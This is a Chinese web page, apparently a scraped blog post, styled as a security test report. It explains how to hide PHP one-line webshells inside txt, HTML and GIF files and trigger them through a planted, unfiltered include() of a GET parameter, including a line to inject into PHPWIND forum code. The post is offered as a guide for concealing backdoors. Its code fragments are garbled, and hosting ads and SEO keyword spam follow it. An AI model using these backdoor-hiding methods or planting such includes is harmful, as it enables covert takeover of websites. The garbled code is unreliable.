文件网站安全测试报告

网站安全测试  时间:2021-02-14  阅读:()

网站安全测试报告

最近很多朋友都在问我是否能把我那一句话木马隐藏到HTML或图片里其实把一句话木马插入到PHP文件中就已经很隐蔽了如果说硬是要放到HTML文件或图片里就接着往下看这篇的篇测试报告吧。要知道如果光把P HP语句放到图片里是无论如何也不能执行的 因为PHP只解析扩展名为php的文件。所以说要能使隐藏在图片里的PHP语句执行。我们就的借助PHP中的调用函数 include、 require等。

我们还记得前些日子把木马隐藏到图片的文章吧。也就是在PHP文件里用include("x.gif")这样的语句来调用隐藏在图片的木马语句。 ASP中语句也类似。看似非常隐蔽但直接调用图片对稍微懂点PHP的人就不难发现可疑之处。 由于URL里用GET方式很难传递参数这就使得插入木马的性能得不到发挥。

Include函数在PHP中使用的比较频繁所以引起的安全问题也实在太多例如PHPWIND1.36的漏洞就是因为include后面的变量没做过滤引起的。 由此我们就可以构造类似的语句来插入到PHP文件中。然后把木马隐藏到图片或HTML文件里可以说隐蔽性就更高了。如在PHPWIND论坛里插入下面的语句

‘’?@includeinclud/.$PHPWIND_ROOT;?一般管理员是无法看出来的。

有了include函数来辅助帮忙我们就可以把PH P木马隐藏到诸如txt、 html和图片文件等很多类型的文件里来了。 因为txt、 html和图片文件这三种类型的文件最无论在论坛还是文章系统里是最为常见的了下面我们就依次来做测试。

首先建立一PHP文件test.php文件内容为:

$test=$_GET[''' 'test'' ' '];

@include' ' ''test/' ''' .$test;

?

Txt文件一般都是说明文件所以我们把一句话木马放到目录的说明文件里就O K了。随便建立一个TX T文件t.txt。我们把一句话木马粘贴到t.txt文件里。然后访问

//localhost/test/test.php?test=. ./t.txt如果你看到t.txt的内容就证明Ok了然后把在lanker微型PHP后门客户端木马地址添入//localhost/test/test.php?test=. ./t.txt密码里添入cmd就可以了执行返回的结果都可以看到。

对于HTML的文件一般都为模版文件。为了使插入到HTML的文件的木马能被调用执行而且不被显示出来我们可以在HTML里加入一个隐藏属性的文本框如然后使用方法同上。执行的返回结果一般都可以查看源文件看到。如使用查看本程序目录功能。查看源文件内容为我可以得到目录为C:\Uniserver2_7s\www\test。

下面我们说说图片文件要说最为毒的一招莫过于把木马隐藏到图片里。我们可以直接对一个图片进行编辑把插入到图片末尾

经测试一般都不会对图片造成影响。然后同样方法客户端木马地址添入

我们查看P HP环境变量返回的是结果是原图片。

这里可能要和我们想象的结果有些差距了其实命令已经运行了只是返回的结果看不到而已 因为这是真正的GIF文件所以是不会显示返回结果的 为了证明是否真的执行了命令我们执行上传文件命令。果不出所料文件已经成功上传到服务器上。这样伪造的优点是隐蔽性好。缺点也自然不用说了是没回显。如果你想看到返回的结果那就拿出记事本伪造一个假的图片文件吧。

到这里就基本测试完了 怎样隐蔽PHP后门就看你自己的选择了。行文仓促如有不妥之处请指出!

快云科技:香港沙田CN2云服务器低至29元/月起;美国高防弹性云/洛杉矶CUVIP低至33.6元/月起

快云科技怎么样?快云科技是一家成立于2020年的新起国内主机商,资质齐全 持有IDC ICP ISP等正规商家。云服务器网(yuntue.com)小编之前已经介绍过很多快云科技的香港及美国云服务器了,这次再介绍一下新的优惠方案。目前,香港云沙田CN2云服务器低至29元/月起;美国超防弹性云/洛杉矶CUVIP低至33.6元/月起。快云科技的云主机架构采用KVM虚拟化技术,全盘SSD硬盘,RAID10...

Friendhosting(月1.35欧元),不限流量,9机房可选

今天9月10日是教师节,我们今天有没有让孩子带礼物和花送给老师?我们这边不允许带礼物进学校,直接有校长在门口遇到有带礼物的直接拦截下来。今天有看到Friendhosting最近推出了教师节优惠,VPS全场45折,全球多机房可选,有需要的可以看看。Friendhosting是一家成立于2009年的保加利亚主机商,主要提供销售VPS和独立服务器出租业务,数据中心分布在:荷兰、保加利亚、立陶宛、捷克、乌...

cyun29元/月,香港CN2 GIA云服务器低至起;香港多ip站群云服务器4核4G

cyun怎么样?cyun蓝米数据是一家(香港)藍米數據有限公司旗下品牌,蓝米云、蓝米主机等同属于该公司品牌。CYUN全系列云产品采用KVM架构,SSD磁盘阵列,优化线路,低延迟,高稳定。目前,cyun推出的香港云服务器性价比超高,香港cn2 gia云服务器,1核1G1M/系统盘+20G数据盘,低至29元/月起;香港多ip站群云服务器,16个ip/4核4G仅220元/月起,希望买香港站群服务器的站长...

网站安全测试为你推荐
支付宝查询余额我的支付宝如何查询余额ghostxp3GhostXP3电脑公司特别版V499怎么安装数码资源网安卓有没有可以离线刷题的软件?不兼容WIN7 64位系统与某些软件不兼容怎么办?中小企业信息化小企业需要信息化吗?需要的话要怎么实现信息化呢?神雕侠侣礼包大全神雕侠侣先手礼包在哪领怎么点亮qq空间图标怎样点亮qq空间的图标保护气球什么气球可以骑?免费qq空间装扮有办法免费装扮QQ空间吗??商标注册查询官网怎么查商标是否注册成功
免费域名解析 联通c套餐 60g硬盘 表格样式 NetSpeeder 国外php空间 商务主机 dux 合租空间 hostloc 搜索引擎提交入口 万网空间购买 drupal安装 美国独立日 联通网站 免费ftp 云服务器比较 畅行云 lamp什么意思 阿里云手机官网 更多